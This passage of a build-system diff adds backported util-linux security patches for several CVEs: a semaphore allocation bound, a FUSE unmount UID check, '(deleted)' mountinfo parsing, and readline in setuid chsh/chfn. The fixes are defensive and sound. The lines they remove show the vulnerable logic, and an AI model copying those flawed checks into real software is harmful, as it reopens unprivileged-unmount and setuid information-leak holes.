+Date: Tue, 27 Jul 2021 11:58:31 +0200
+Subject: [PATCH] sys-utils/ipcutils: be careful when call calloc() for uint64
+ nmembs
+
+Fix: https://github.com/karelzak/util-linux/issues/1395
+Signed-off-by: Karel Zak <kzak@redhat.com>
+
+CVE: CVE-2021-37600
+Upstream-Status: Backport [1c9143d0c1f979c3daf10e1c37b5b1e916c22a1c]
+
+Signed-off-by: Dragos-Marian Panait <dragos.panait@windriver.com>
+---
+ sys-utils/ipcutils.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/sys-utils/ipcutils.c b/sys-utils/ipcutils.c
+index e784c4dcb..18868cfd3 100644
+--- a/sys-utils/ipcutils.c
++++ b/sys-utils/ipcutils.c
+@@ -218,7 +218,7 @@ static void get_sem_elements(struct sem_data *p)
+ {
+ size_t i;
+
+- if (!p || !p->sem_nsems || p->sem_perm.id < 0)
++ if (!p || !p->sem_nsems || p->sem_nsems > SIZE_MAX || p->sem_perm.id < 0)
+ return;
+
+ p->elements = xcalloc(p->sem_nsems, sizeof(struct sem_elem));
+--
+2.25.1
+
diff --git a/meta/recipes-core/util-linux/util-linux/CVE-2021-3995.patch b/meta/recipes-core/util-linux/util-linux/CVE-2021-3995.patch
new file mode 100644
index 0000000000..1dcb66ad1d
--- /dev/null
+++ b/meta/recipes-core/util-linux/util-linux/CVE-2021-3995.patch
@@ -0,0 +1,139 @@
+From f3db9bd609494099f0c1b95231c5dfe383346929 Mon Sep 17 00:00:00 2001
+From: Karel Zak <kzak@redhat.com>
+Date: Wed, 24 Nov 2021 13:53:25 +0100
+Subject: [PATCH] libmount: fix UID check for FUSE umount [CVE-2021-3995]
+
+Improper UID check allows an unprivileged user to unmount FUSE
+filesystems of users with similar UID.
+
+Signed-off-by: Karel Zak <kzak@redhat.com>
+
+CVE: CVE-2021-3995
+Upstream-Status: Backport [https://github.com/util-linux/util-linux/commit/f3db9bd609494099f0c1b95231c5dfe383346929]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ include/strutils.h | 2 +-
+ libmount/src/context_umount.c | 14 +++---------
+ libmount/src/mountP.h | 1 +
+ libmount/src/optstr.c | 42 +++++++++++++++++++++++++++++++++++
+ 4 files changed, 47 insertions(+), 12 deletions(-)
+
+diff --git a/include/strutils.h b/include/strutils.h
+index 6e95707ea9..a84d29594d 100644
+--- a/include/strutils.h
++++ b/include/strutils.h
+@@ -91,8 +91,8 @@ static inline char *mem2strcpy(char *dest, const void *src, size_t n, size_t nma
+ if (n + 1 > nmax)
+ n = nmax - 1;
+
++ memset(dest, '\0', nmax);
+ memcpy(dest, src, n);
+- dest[nmax-1] = '\0';
+ return dest;
+ }
+
+diff --git a/libmount/src/context_umount.c b/libmount/src/context_umount.c
+index 173637a15a..8773c65ffa 100644
+--- a/libmount/src/context_umount.c
++++ b/libmount/src/context_umount.c
+@@ -393,10 +393,7 @@ static int is_fuse_usermount(struct libmnt_context *cxt, int *errsv)
+ struct libmnt_ns *ns_old;
+ const char *type = mnt_fs_get_fstype(cxt->fs);
+ const char *optstr;
+- char *user_id = NULL;
+- size_t sz;
+- uid_t uid;
+- char uidstr[sizeof(stringify_value(ULONG_MAX))];
++ uid_t uid, entry_uid;
+
+ *errsv = 0;
+
+@@ -413,11 +410,7 @@ static int is_fuse_usermount(struct libmnt_context *cxt, int *errsv)
+ optstr = mnt_fs_get_fs_options(cxt->fs);
+ if (!optstr)
+ return 0;
+-
+- if (mnt_optstr_get_option(optstr, "user_id", &user_id, &sz) != 0)
+- return 0;
+-
+- if (sz == 0 || user_id == NULL)
++ if (mnt_optstr_get_uid(optstr, "user_id", &entry_uid) != 0)
+ return 0;
+
+ /* get current user */
+@@ -434,8 +427,7 @@ static int is_fuse_usermount(struct libmnt_context *cxt, int *errsv)
+ return 0;
+ }
+
+- snprintf(uidstr, sizeof(uidstr), "%lu", (unsigned long) uid);
+- return strncmp(user_id, uidstr, sz) == 0;
++ return uid == entry_uid;
+ }
+
+ /*
+diff --git a/libmount/src/mountP.h b/libmount/src/mountP.h
+index d43a835418..22442ec55e 100644
+--- a/libmount/src/mountP.h
++++ b/libmount/src/mountP.h
+@@ -400,6 +400,7 @@ extern const struct libmnt_optmap *mnt_optmap_get_entry(
+ const struct libmnt_optmap **mapent);
+
+ /* optstr.c */
++extern int mnt_optstr_get_uid(const char *optstr, const char *name, uid_t *uid);
+ extern int mnt_optstr_remove_option_at(char **optstr, char *begin, char *end);
+ extern int mnt_optstr_fix_gid(char **optstr, char *value, size_t valsz, char **next);
+ extern int mnt_optstr_fix_uid(char **optstr, char *value, size_t valsz, char **next);
+diff --git a/libmount/src/optstr.c b/libmount/src/optstr.c
+index 921b9318e7..16800f571c 100644
+--- a/libmount/src/optstr.c
++++ b/libmount/src/optstr.c
+@@ -1090,6 +1090,48 @@ int mnt_optstr_fix_user(char **optstr)
+ return rc;
+ }
+
++/*
++ * Converts value from @optstr addressed by @name to uid.
++ *
++ * Returns: 0 on success, 1 if not found, <0 on error
++ */
++int mnt_optstr_get_uid(const char *optstr, const char *name, uid_t *uid)
++{
++ char *value = NULL;
++ size_t valsz = 0;
++ char buf[sizeof(stringify_value(UINT64_MAX))];
++ int rc;
++ uint64_t num;
++
++ assert(optstr);
++ assert(name);
++ assert(uid);
++
++ rc = mnt_optstr_get_option(optstr, name, &value, &valsz);
++ if (rc != 0)
++ goto fail;
++
++ if (valsz > sizeof(buf) - 1) {
++ rc = -ERANGE;
++ goto fail;
++ }
++ mem2strcpy(buf, value, valsz, sizeof(buf));
++
++ rc = ul_strtou64(buf, &num, 10);
++ if (rc != 0)
++ goto fail;
++ if (num > ULONG_MAX || (uid_t) num != num) {
++ rc = -ERANGE;
++ goto fail;
++ }
++ *uid = (uid_t) num;
++
++ return 0;
++fail:
++ DBG(UTILS, ul_debug("failed to convert '%s'= to number [rc=%d]", name, rc));
++ return rc;
++}
++
+ /**
+ * mnt_match_options:
+ * @optstr: options string
diff --git a/meta/recipes-core/util-linux/util-linux/CVE-2021-3996.patch b/meta/recipes-core/util-linux/util-linux/CVE-2021-3996.patch
new file mode 100644
index 0000000000..1610b5a0fe
--- /dev/null
+++ b/meta/recipes-core/util-linux/util-linux/CVE-2021-3996.patch
@@ -0,0 +1,226 @@
+From 018a10907fa9885093f6d87401556932c2d8bd2b Mon Sep 17 00:00:00 2001
+From: Karel Zak <kzak@redhat.com>
+Date: Tue, 4 Jan 2022 10:54:20 +0100
+Subject: [PATCH] libmount: fix (deleted) suffix issue [CVE-2021-3996]
+
+This issue is related to parsing the /proc/self/mountinfo file allows an
+unprivileged user to unmount other user's filesystems that are either
+world-writable themselves or mounted in a world-writable directory.
+
+The support for "(deleted)" is no more necessary as the Linux kernel does
+not use it in /proc/self/mountinfo and /proc/self/mount files anymore.
+
+Signed-off-by: Karel Zak <kzak@redhat.com>
+
+CVE: CVE-2021-3996
+Upstream-Status: Backport [https://github.com/util-linux/util-linux/commit/018a10907fa9885093f6d87401556932c2d8bd2b]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ libmount/src/tab_parse.c | 5 -----
+ tests/expected/findmnt/filter-options | 1 -
+ tests/expected/findmnt/filter-options-nameval-neg | 3 +--
+ tests/expected/findmnt/filter-types-neg | 1 -
+ tests/expected/findmnt/outputs-default | 3 +--
+ tests/expected/findmnt/outputs-force-tree | 3 +--
+ tests/expected/findmnt/outputs-kernel | 3 +--
+ tests/expected/libmount/tabdiff-mount | 1 -
+ tests/expected/libmount/tabdiff-move | 1 -
+ tests/expected/libmount/tabdiff-remount | 1 -
+ tests/expected/libmount/tabdiff-umount | 1 -
+ tests/expected/libmount/tabfiles-parse-mountinfo | 11 -----------
+ tests/expected/libmount/tabfiles-py-parse-mountinfo | 11 -----------
+ tests/ts/findmnt/files/mountinfo | 1 -
+ tests/ts/findmnt/files/mountinfo-nonroot | 1 -
+ tests/ts/libmount/files/mountinfo | 1 -
+ 16 files changed, 4 insertions(+), 44 deletions(-)
+
+diff --git a/libmount/src/tab_parse.c b/libmount/src/tab_parse.c
+index 917779ab6d..4407f9c9c7 100644
+--- a/libmount/src/tab_parse.c
++++ b/libmount/src/tab_parse.c
+@@ -225,11 +225,6 @@ static int mnt_parse_mountinfo_line(struct libmnt_fs *fs, const char *s)
+ goto fail;
+ }
+
+- /* remove "\040(deleted)" suffix */
+- p = (char *) endswith(fs->target, PATH_DELETED_SUFFIX);
+- if (p && *p)
+- *p = '\0';
+-
+ s = skip_separator(s);
+
+ /* (6) vfs options (fs-independent) */
+diff --git a/tests/expected/findmnt/filter-options b/tests/expected/findmnt/filter-options
+index 2606bce76b..97b0ead0ad 100644
+--- a/tests/expected/findmnt/filter-options
++++ b/tests/expected/findmnt/filter-options
+@@ -28,5 +28,4 @@ TARGET SOURCE FSTYPE OPTIONS
+ /home/kzak/.gvfs gvfs-fuse-daemon fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
+ /var/lib/nfs/rpc_pipefs sunrpc rpc_pipefs rw,relatime
+ /mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-/mnt/foo /fooooo bar rw,relatime
+ rc=0
+diff --git a/tests/expected/findmnt/filter-options-nameval-neg b/tests/expected/findmnt/filter-options-nameval-neg
+index 5471d65af1..f0467ef755 100644
+--- a/tests/expected/findmnt/filter-options-nameval-neg
++++ b/tests/expected/findmnt/filter-options-nameval-neg
+@@ -29,6 +29,5 @@ TARGET SOURCE FSTYPE OPTIO
+ |-/home/kzak /dev/mapper/kzak-home ext4 rw,noatime,barrier=1,data=ordered
+ | `-/home/kzak/.gvfs gvfs-fuse-daemon fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
+ |-/var/lib/nfs/rpc_pipefs sunrpc rpc_pipefs rw,relatime
+-|-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-`-/mnt/foo /fooooo bar rw,relatime
++`-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+ rc=0
+diff --git a/tests/expected/findmnt/filter-types-neg b/tests/expected/findmnt/filter-types-neg
+index 2606bce76b..97b0ead0ad 100644
+--- a/tests/expected/findmnt/filter-types-neg
++++ b/tests/expected/findmnt/filter-types-neg
+@@ -28,5 +28,4 @@ TARGET SOURCE FSTYPE OPTIONS
+ /home/kzak/.gvfs gvfs-fuse-daemon fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
+ /var/lib/nfs/rpc_pipefs sunrpc rpc_pipefs rw,relatime
+ /mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-/mnt/foo /fooooo bar rw,relatime
+ rc=0
+diff --git a/tests/expected/findmnt/outputs-default b/tests/expected/findmnt/outputs-default
+index 59495797bd..01599355ec 100644
+--- a/tests/expected/findmnt/outputs-default
++++ b/tests/expected/findmnt/outputs-default
+@@ -30,6 +30,5 @@ TARGET SOURCE FSTYPE OPTIO
+ |-/home/kzak /dev/mapper/kzak-home ext4 rw,noatime,barrier=1,data=ordered
+ | `-/home/kzak/.gvfs gvfs-fuse-daemon fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
+ |-/var/lib/nfs/rpc_pipefs sunrpc rpc_pipefs rw,relatime
+-|-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-`-/mnt/foo /fooooo bar rw,relatime
++`-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+ rc=0
+diff --git a/tests/expected/findmnt/outputs-force-tree b/tests/expected/findmnt/outputs-force-tree
+index 59495797bd..01599355ec 100644
+--- a/tests/expected/findmnt/outputs-force-tree
++++ b/tests/expected/findmnt/outputs-force-tree
+@@ -30,6 +30,5 @@ TARGET SOURCE FSTYPE OPTIO
+ |-/home/kzak /dev/mapper/kzak-home ext4 rw,noatime,barrier=1,data=ordered
+ | `-/home/kzak/.gvfs gvfs-fuse-daemon fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
+ |-/var/lib/nfs/rpc_pipefs sunrpc rpc_pipefs rw,relatime
+-|-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-`-/mnt/foo /fooooo bar rw,relatime
++`-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+ rc=0
+diff --git a/tests/expected/findmnt/outputs-kernel b/tests/expected/findmnt/outputs-kernel
+index 59495797bd..01599355ec 100644
+--- a/tests/expected/findmnt/outputs-kernel
++++ b/tests/expected/findmnt/outputs-kernel
+@@ -30,6 +30,5 @@ TARGET SOURCE FSTYPE OPTIO
+ |-/home/kzak /dev/mapper/kzak-home ext4 rw,noatime,barrier=1,data=ordered
+ | `-/home/kzak/.gvfs gvfs-fuse-daemon fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
+ |-/var/lib/nfs/rpc_pipefs sunrpc rpc_pipefs rw,relatime
+-|-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-`-/mnt/foo /fooooo bar rw,relatime
++`-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+ rc=0
+diff --git a/tests/expected/libmount/tabdiff-mount b/tests/expected/libmount/tabdiff-mount
+index 420aeacd5e..3c18f8dc4f 100644
+--- a/tests/expected/libmount/tabdiff-mount
++++ b/tests/expected/libmount/tabdiff-mount
+@@ -1,3 +1,2 @@
+ /dev/mapper/kzak-home on /home/kzak: MOUNTED
+-/fooooo on /mnt/foo: MOUNTED
+ tmpfs on /mnt/test/foo bar: MOUNTED
+diff --git a/tests/expected/libmount/tabdiff-move b/tests/expected/libmount/tabdiff-move
+index 24f9bc791b..95820d93ef 100644
+--- a/tests/expected/libmount/tabdiff-move
++++ b/tests/expected/libmount/tabdiff-move
+@@ -1,3 +1,2 @@
+ //foo.home/bar/ on /mnt/music: MOVED to /mnt/music
+-/fooooo on /mnt/foo: UMOUNTED
+ tmpfs on /mnt/test/foo bar: UMOUNTED
+diff --git a/tests/expected/libmount/tabdiff-remount b/tests/expected/libmount/tabdiff-remount
+index 82ebeab390..876bfd9539 100644
+--- a/tests/expected/libmount/tabdiff-remount
++++ b/tests/expected/libmount/tabdiff-remount
+@@ -1,4 +1,3 @@
+ /dev/mapper/kzak-home on /home/kzak: REMOUNTED from 'rw,noatime,barrier=1,data=ordered' to 'ro,noatime,barrier=1,data=ordered'
+ //foo.home/bar/ on /mnt/sounds: REMOUNTED from 'rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344' to 'ro,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344'
+-/fooooo on /mnt/foo: UMOUNTED
+ tmpfs on /mnt/test/foo bar: UMOUNTED
+diff --git a/tests/expected/libmount/tabdiff-umount b/tests/expected/libmount/tabdiff-umount
+index a3e0fe48a1..c7be725b92 100644
+--- a/tests/expected/libmount/tabdiff-umount
++++ b/tests/expected/libmount/tabdiff-umount
+@@ -1,3 +1,2 @@
+ /dev/mapper/kzak-home on /home/kzak: UMOUNTED
+-/fooooo on /mnt/foo: UMOUNTED
+ tmpfs on /mnt/test/foo bar: UMOUNTED
+diff --git a/tests/expected/libmount/tabfiles-parse-mountinfo b/tests/expected/libmount/tabfiles-parse-mountinfo
+index 47eb770061..d5ba5248e4 100644
+--- a/tests/expected/libmount/tabfiles-parse-mountinfo
++++ b/tests/expected/libmount/tabfiles-parse-mountinfo
+@@ -351,17 +351,6 @@ id: 47
+ parent: 20
+ devno: 0:38
+ ------ fs:
+-source: /fooooo
+-target: /mnt/foo
+-fstype: bar
+-optstr: rw,relatime
+-VFS-optstr: rw,relatime
+-FS-opstr: rw
+-root: /
+-id: 48
+-parent: 20
+-devno: 0:39
+------- fs:
+ source: tmpfs
+ target: /mnt/test/foo bar
+ fstype: tmpfs
+diff --git a/tests/expected/libmount/tabfiles-py-parse-mountinfo b/tests/expected/libmount/tabfiles-py-parse-mountinfo
+index 47eb770061..d5ba5248e4 100644
+--- a/tests/expected/libmount/tabfiles-py-parse-mountinfo
++++ b/tests/expected/libmount/tabfiles-py-parse-mountinfo
+@@ -351,17 +351,6 @@ id: 47
+ parent: 20
+ devno: 0:38
+ ------ fs:
+-source: /fooooo
+-target: /mnt/foo
+-fstype: bar
+-optstr: rw,relatime
+-VFS-optstr: rw,relatime
+-FS-opstr: rw
+-root: /
+-id: 48
+-parent: 20
+-devno: 0:39
+------- fs:
+ source: tmpfs
+ target: /mnt/test/foo bar
+ fstype: tmpfs
+diff --git a/tests/ts/findmnt/files/mountinfo b/tests/ts/findmnt/files/mountinfo
+index 475ea1a337..ff1e664a84 100644
+--- a/tests/ts/findmnt/files/mountinfo
++++ b/tests/ts/findmnt/files/mountinfo
+@@ -30,4 +30,3 @@
+ 44 41 0:36 / /home/kzak/.gvfs rw,nosuid,nodev,relatime - fuse.gvfs-fuse-daemon gvfs-fuse-daemon rw,user_id=500,group_id=500
+ 45 20 0:37 / /var/lib/nfs/rpc_pipefs rw,relatime - rpc_pipefs sunrpc rw
+ 47 20 0:38 / /mnt/sounds rw,relatime - cifs //foo.home/bar/ rw,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-48 20 0:39 / /mnt/foo\040(deleted) rw,relatime - bar /fooooo rw
+diff --git a/tests/ts/findmnt/files/mountinfo-nonroot b/tests/ts/findmnt/files/mountinfo-nonroot
+index e15b467016..87b421d2ef 100644
+--- a/tests/ts/findmnt/files/mountinfo-nonroot
++++ b/tests/ts/findmnt/files/mountinfo-nonroot
+@@ -29,4 +29,3 @@
+ 44 41 0:36 / /home/kzak/.gvfs rw,nosuid,nodev,relatime - fuse.gvfs-fuse-daemon gvfs-fuse-daemon rw,user_id=500,group_id=500
+ 45 20 0:37 / /var/lib/nfs/rpc_pipefs rw,relatime - rpc_pipefs sunrpc rw
+ 47 20 0:38 / /mnt/sounds rw,relatime - cifs //foo.home/bar/ rw,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-48 20 0:39 / /mnt/foo\040(deleted) rw,relatime - bar /fooooo rw
+diff --git a/tests/ts/libmount/files/mountinfo b/tests/ts/libmount/files/mountinfo
+index c063071833..2b01740481 100644
+--- a/tests/ts/libmount/files/mountinfo
++++ b/tests/ts/libmount/files/mountinfo
+@@ -30,5 +30,4 @@
+ 44 41 0:36 / /home/kzak/.gvfs rw,nosuid,nodev,relatime - fuse.gvfs-fuse-daemon gvfs-fuse-daemon rw,user_id=500,group_id=500
+ 45 20 0:37 / /var/lib/nfs/rpc_pipefs rw,relatime - rpc_pipefs sunrpc rw
+ 47 20 0:38 / /mnt/sounds rw,relatime - cifs //foo.home/bar/ rw,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-48 20 0:39 / /mnt/foo\040(deleted) rw,relatime - bar /fooooo rw
+ 49 20 0:56 / /mnt/test/foo bar rw,relatime shared:323 - tmpfs tmpfs rw
diff --git a/meta/recipes-core/util-linux/util-linux/CVE-2022-0563.patch b/meta/recipes-core/util-linux/util-linux/CVE-2022-0563.patch
new file mode 100644
index 0000000000..54b496ea3f
--- /dev/null
+++ b/meta/recipes-core/util-linux/util-linux/CVE-2022-0563.patch
@@ -0,0 +1,161 @@
+From faa5a3a83ad0cb5e2c303edbfd8cd823c9d94c17 Mon Sep 17 00:00:00 2001
+From: Karel Zak <kzak@redhat.com>
+Date: Thu, 10 Feb 2022 12:03:17 +0100
+Subject: [PATCH] chsh, chfn: remove readline support [CVE-2022-0563]
+
+The readline library uses INPUTRC= environment variable to get a path
+to the library config file. When the library cannot parse the
+specified file, it prints an error message containing data from the
+file.
+
+Unfortunately, the library does not use secure_getenv() (or a similar
+concept) to avoid vulnerabilities that could occur if set-user-ID or
+set-group-ID programs.
+
+Reported-by: Rory Mackie <rory.mackie@trailofbits.com>
+Signed-off-by: Karel Zak <kzak@redhat.com>
+
+Upstream-status: Backport
+https://github.com/util-linux/util-linux/commit/faa5a3a83ad0cb5e2c303edbfd8cd823c9d94c17
+
+CVE: CVE-2022-0563
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ login-utils/Makemodule.am | 2 +-
+ login-utils/chfn.c | 16 +++------------
+ login-utils/chsh.c | 42 ++-------------------------------------
+ 3 files changed, 6 insertions(+), 54 deletions(-)
+
+diff --git a/login-utils/Makemodule.am b/login-utils/Makemodule.am
+index fac5bfc..73636af 100644
+--- a/login-utils/Makemodule.am
++++ b/login-utils/Makemodule.am
+@@ -82,7 +82,7 @@ chfn_chsh_sources = \
+ login-utils/ch-common.c
+ chfn_chsh_cflags = $(SUID_CFLAGS) $(AM_CFLAGS)
+ chfn_chsh_ldflags = $(SUID_LDFLAGS) $(AM_LDFLAGS)
+-chfn_chsh_ldadd = libcommon.la $(READLINE_LIBS)
++chfn_chsh_ldadd = libcommon.la
+
+ if CHFN_CHSH_PASSWORD
+ chfn_chsh_ldadd += -lpam
+diff --git a/login-utils/chfn.c b/login-utils/chfn.c
+index b739555..2f8e44a 100644
+--- a/login-utils/chfn.c
++++ b/login-utils/chfn.c
+@@ -56,11 +56,6 @@
+ # include "auth.h"
+ #endif
+
+-#ifdef HAVE_LIBREADLINE
+-# define _FUNCTION_DEF
+-# include <readline/readline.h>
+-#endif
+-
+ struct finfo {
+ char *full_name;
+ char *office;
+@@ -229,22 +224,17 @@ static char *ask_new_field(struct chfn_control *ctl, const char *question,
+ {
+ int len;
+ char *buf;
+-#ifndef HAVE_LIBREADLINE
+- size_t dummy = 0;
+-#endif
+
+ if (!def_val)
+ def_val = "";
++
+ while (true) {
+ printf("%s [%s]: ", question, def_val);
+ __fpurge(stdin);
+-#ifdef HAVE_LIBREADLINE
+- rl_bind_key('\t', rl_insert);
+- if ((buf = readline(NULL)) == NULL)
+-#else
++
+ if (getline(&buf, &dummy, stdin) < 0)
+-#endif
+ errx(EXIT_FAILURE, _("Aborted."));
++
+ /* remove white spaces from string end */
+ ltrim_whitespace((unsigned char *) buf);
+ len = rtrim_whitespace((unsigned char *) buf);
+diff --git a/login-utils/chsh.c b/login-utils/chsh.c
+index a9ebec8..ee6ff87 100644
+--- a/login-utils/chsh.c
++++ b/login-utils/chsh.c
+@@ -58,11 +58,6 @@
+ # include "auth.h"
+ #endif
+
+-#ifdef HAVE_LIBREADLINE
+-# define _FUNCTION_DEF
+-# include <readline/readline.h>
+-#endif
+-
+ struct sinfo {
+ char *username;
+ char *shell;
+@@ -121,33 +116,6 @@ static void print_shells(void)
+ endusershell();
+ }
+
+-#ifdef HAVE_LIBREADLINE
+-static char *shell_name_generator(const char *text, int state)
+-{
+- static size_t len;
+- char *s;
+-
+- if (!state) {
+- setusershell();
+- len = strlen(text);
+- }
+-
+- while ((s = getusershell())) {
+- if (strncmp(s, text, len) == 0)
+- return xstrdup(s);
+- }
+- return NULL;
+-}
+-
+-static char **shell_name_completion(const char *text,
+- int start __attribute__((__unused__)),
+- int end __attribute__((__unused__)))
+-{
+- rl_attempted_completion_over = 1;
+- return rl_completion_matches(text, shell_name_generator);
+-}
+-#endif
+-
+ /*
+ * parse_argv () --
+ * parse the command line arguments, and fill in "pinfo" with any
+@@ -198,20 +166,14 @@ static char *ask_new_shell(char *question, char *oldshell)
+ {
+ int len;
+ char *ans = NULL;
+-#ifdef HAVE_LIBREADLINE
+- rl_attempted_completion_function = shell_name_completion;
+-#else
+ size_t dummy = 0;
+-#endif
++
+ if (!oldshell)
+ oldshell = "";
+ printf("%s [%s]\n", question, oldshell);
+-#ifdef HAVE_LIBREADLINE
+- if ((ans = readline("> ")) == NULL)
+-#else
+ if (getline(&ans, &dummy, stdin) < 0)
+-#endif
+ return NULL;
++
+ /* remove the newline at the end of ans. */
+ ltrim_whitespace((unsigned char *) ans);
+ len = rtrim_whitespace((unsigned char *) ans);
+--
+2.25.1
+
diff --git a/meta/recipes-core/util-linux/util-linux/include-strutils-cleanup-strto-functions.patch b/meta/recipes-core/util-linux/util-linux/include-strutils-cleanup-strto-functions.patch
new file mode 100644
index 0000000000..5d5a370821
--- /dev/null
+++ b/meta/recipes-core/util-linux/util-linux/include-strutils-cleanup-strto-functions.patch
@@ -0,0 +1,270 @@
+From 84825b161ba5d18da4142893b9789b3fc71284d9 Mon Sep 17 00:00:00 2001
+From: Karel Zak <kzak@redhat.com>
+Date: Tue, 22 Jun 2021 14:20:42 +0200
+Subject: [PATCH] include/strutils: cleanup strto..() functions
+
+* add ul_strtos64() and ul_strtou64()
+* add simple test
+
+Addresses: https://github.com/karelzak/util-linux/issues/1358
+Signed-off-by: Karel Zak <kzak@redhat.com>
+
+Upstream-Backport: [https://github.com/util-linux/util-linux/commit/84825b161ba5d18da4142893b9789b3fc71284d9]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ include/strutils.h | 3 +
+ lib/strutils.c | 174 ++++++++++++++++++++++++++-------------------
+ 2 files changed, 105 insertions(+), 72 deletions(-)
+
+diff --git a/include/strutils.h b/include/strutils.h
+index e75a2f0e17..389e849905 100644
+--- a/include/strutils.h
++++ b/include/strutils.h
+@@ -19,6 +19,9 @@ extern int parse_size(const char *str, uintmax_t *res, int *power);
+ extern int strtosize(const char *str, uintmax_t *res);
+ extern uintmax_t strtosize_or_err(const char *str, const char *errmesg);
+
++extern int ul_strtos64(const char *str, int64_t *num, int base);
++extern int ul_strtou64(const char *str, uint64_t *num, int base);
++
+ extern int16_t strtos16_or_err(const char *str, const char *errmesg);
+ extern uint16_t strtou16_or_err(const char *str, const char *errmesg);
+ extern uint16_t strtox16_or_err(const char *str, const char *errmesg);
+diff --git a/lib/strutils.c b/lib/strutils.c
+index ee2c835495..d9976dca70 100644
+--- a/lib/strutils.c
++++ b/lib/strutils.c
+@@ -319,39 +319,80 @@ char *strndup(const char *s, size_t n)
+ }
+ #endif
+
+-static uint32_t _strtou32_or_err(const char *str, const char *errmesg, int base);
+-static uint64_t _strtou64_or_err(const char *str, const char *errmesg, int base);
++/*
++ * convert strings to numbers; returns <0 on error, and 0 on success
++ */
++int ul_strtos64(const char *str, int64_t *num, int base)
++{
++ char *end = NULL;
+
+-int16_t strtos16_or_err(const char *str, const char *errmesg)
++ errno = 0;
++ if (str == NULL || *str == '\0')
++ return -EINVAL;
++ *num = (int64_t) strtoimax(str, &end, base);
++
++ if (errno || str == end || (end && *end))
++ return -EINVAL;
++ return 0;
++}
++
++int ul_strtou64(const char *str, uint64_t *num, int base)
+ {
+- int32_t num = strtos32_or_err(str, errmesg);
++ char *end = NULL;
+
+- if (num < INT16_MIN || num > INT16_MAX) {
+- errno = ERANGE;
+- err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
+- }
+- return num;
++ errno = 0;
++ if (str == NULL || *str == '\0')
++ return -EINVAL;
++ *num = (uint64_t) strtoumax(str, &end, base);
++
++ if (errno || str == end || (end && *end))
++ return -EINVAL;
++ return 0;
+ }
+
+-static uint16_t _strtou16_or_err(const char *str, const char *errmesg, int base)
++/*
++ * Covert strings to numbers and print message on error.
++ *
++ * Note that hex functions (strtox..()) returns unsigned numbers, if you need
++ * something else then use ul_strtos64(s, &n, 16).
++ */
++int64_t strtos64_or_err(const char *str, const char *errmesg)
+ {
+- uint32_t num = _strtou32_or_err(str, errmesg, base);
++ int64_t num = 0;
+
+- if (num > UINT16_MAX) {
+- errno = ERANGE;
+- err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
